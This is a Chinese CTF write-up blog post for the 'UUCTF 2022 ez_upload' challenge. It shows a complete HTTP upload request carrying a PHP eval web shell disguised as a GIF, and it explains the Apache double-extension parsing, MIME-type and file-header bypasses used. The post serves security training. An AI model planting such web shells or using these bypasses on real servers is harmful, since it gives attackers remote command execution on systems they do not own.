【CTF】[UUCTF 2022 新生赛]ez_upload

最新推荐文章于 2024-05-09 11:57:14 发布
最新推荐文章于 2024-05-09 11:57:14 发布
阅读量656 收藏
点赞数 1
分类专栏: # CTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47055136/article/details/131290901
版权

文章目录

[UUCTF 2022 新生赛]ez_upload

play

POST /upload.php HTTP/1.1
Host: node1.anna.nssctf.cn:28175
Content-Length: 342
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node1.anna.nssctf.cn:28175
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6iuAY6mzLsndANyM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://node1.anna.nssctf.cn:28175/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary6iuAY6mzLsndANyM
Content-Disposition: form-data; name="file"; filename="4.jpg.php"
Content-Type: image/jpeg

GIF89a
	<script language='php'>@eval($_POST['cmd']);</script>
------WebKitFormBoundary6iuAY6mzLsndANyM
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundary6iuAY6mzLsndANyM--

webshell工具连接
flag 在/目录下
在这里插入图片描述

知识点

  • apache解析漏洞
filename="3.jpg.php"
  • mine type校验:
Content-Type: image/jpeg
  • 文件头校验
GIF89a
  • 内容绕过
<script language='php'>@eval($_GET['cmd']);</script>

Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。

西原一点红
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF中的那些技巧_HOMME.pdf
04-19
CTF中的那些技巧_HOMME.pdf
2022工业互联网大-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
[SWPUCTF 2022 新生] 刷题记录
rev1ve的博客
08-12 689
SWPUCTF 2022 新生 若调用类中的静态方法,则需要传递一个数组作为第一个参数。数组的第一个元素是类名,第二个元素是要调用的静态方法名。F12,web开发者都被办了,尝试查看源代码,得到。跟第二关相比变成了强等于,直接数组绕过。打开题目,发现加到19就会变成-20。很明显是使用sql注入中的万能密码。一看就是base64加密,直接解码。打开题目,第一关提示在http头。分析一下,提示POST传参,出现。分析一下,进行反序列化时,会让。然后执行函数,且参数值为。绕过后,得到第三关源代码。
文件上传刷题
mo2901600657的博客
11-21 85
后缀名是.php .php3 4 5 .pht phtml 都是指向php解析器。传个shell.jpg和,.htaccess直接把shell.jpg解析为php。(题目漏洞,flag放在phpinfo里面)网站刚好有一个phpinfo.php。读取index.php 过滤条件:MIME,文件头,图片很小,不能有php。会对文件头检查,我这直接在一个真实图片的后面插入一个马。和上题一样直接拿一个真实的小图,在后面加上不含php的马。上传一个里面放有马的压缩包上传,然后用phar去读取。
WebUUCTF 2022 新生 个人复现
uuzeray的博客
12-01 794
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。因此md5[0]应该传入%0a0e215962017,但是我们又多了一个%0a 换行符,通过上面这行代码 $md5[0]=substr($md5[0],$sub);$md5[1]===$guessmd5,后者是1秒一变的,得写脚本了。
[UUCTF 2022 新生]ez_upload
weixin_67565639的博客
12-23 1115
a. .user.ini是php的一种配置文件,众所周知php.ini是php的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。手册中的每个指令都有其所属的模式。大致原理就是上传一个配置文件,配置文件中的意思就是让每一个php文件都包含一个你指定的文件(可以是任意后缀),被包含的文件都会用PHP执行。a.可以上传 ini文件,且上传之后文件不被修改,必须为 .user.ini文件名。
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 3656
SWPUCTF 2022新生
2022 UUCTF Web
weixin_63231007的博客
12-19 2099
2022UUCTF web部分题分析
NSS [UUCTF 2022 新生]ez_upload
Jay17的博客
08-09 641
NSS [UUCTF 2022 新生]ez_upload
2022UUCTF-web
bossDDYY的博客
11-03 1800
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
CTF工具-轩禹CTF_RSA工具2.2
02-17
CTF工具,用于完成RSA的基础题目。包括共模攻击、广播攻击、维纳攻击、低加密指数攻击、费马分解、模不互素、NC不互素等常见攻击方式的解题。
PwnHub2022冬季-部分真题
12-20
PwnHub2022冬季-部分真题
NSSCTF第11页(3)
wwwwyyyrre的博客
11-09 523
源码发现会在写入文件之前会删除目录下的除了index.php的文件。写入文件的文件名和文件内容也是可控的,只不过存在过滤stristr函数对文件内容进行过滤,该函数绕过还是简单的,只需要添加一些特殊字符就可以了,和字符串弱类型比较相似。对于文件名的正则匹配,有点没读懂怎么个条件,到底是允许字母还是不允许,测试了一下该代码环境,运行之后明白该正则条件输入.[a-z]是可以绕过该正则的,返回false知道了这些剩下的就是利用了既然会删除除了index.php文件,直接覆盖index.php。
2019 D3CTF ezupload题解
读万卷书,行万里路。
08-15 1221
0 前言 一个 PHP 反序列化的题目。虽然序列化的的利用链简单,但是还是踩了很多坑。 1 题解 序列化脚本:serialize.php <?php class dir{ public $userdir; public $url; public $filename; } $o = new dir(); $tmp = new dir(); $tmp->userdir = $argv[1]; // 需要扫描的目录 $o->userdir = $tmp; $o-
[SWPUCTF 2022 新生]ez_sql
m0_46056107的博客
11-25 266
参数为1的时候没有报错,为2和任何数的时候报,发现空格被过滤了,然后union需要双拼写。它的表有两个为,NSS_tb和users。查表的字段发现flag。数据库为NSS_db。
UUCTF(公共道)
qq_62046696的博客
11-09 1115
sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell禁用了许多的命令,但是没有禁用掉\,这不就可以进行转义了吗。思路很简单,就是可能被以前的思想限制了,直接用a的地址空间,然后a和b用的一个内存变量,所以给。
UUCTF2022-Writeup
Ivyyyyyy1的博客
10-31 1327
UUCTF2022 Writeup
【联通官网及APP注册/登录安全分析报告】
最新发布
weixin_46641057的博客
05-09 552
联通作为通信行业的老大哥, 采用的老一代的图形验证码已经落伍了, 用户体验差,还容易被破解App 端虽然采用了360加固, 但懂技术的都知道, 客户端无论如何都有可能被逆向,靠加固是否无法保证安全的,脱壳后的算法就如同皇帝的新装,暴露在黑客面前。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。
swpuctf 2021 新生]hardrce
07-28
很抱歉,我无法回答你的问题。 #### 引用[.reference_title] - *1* *2* *3* [[SWPUCTF 2021 新生] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值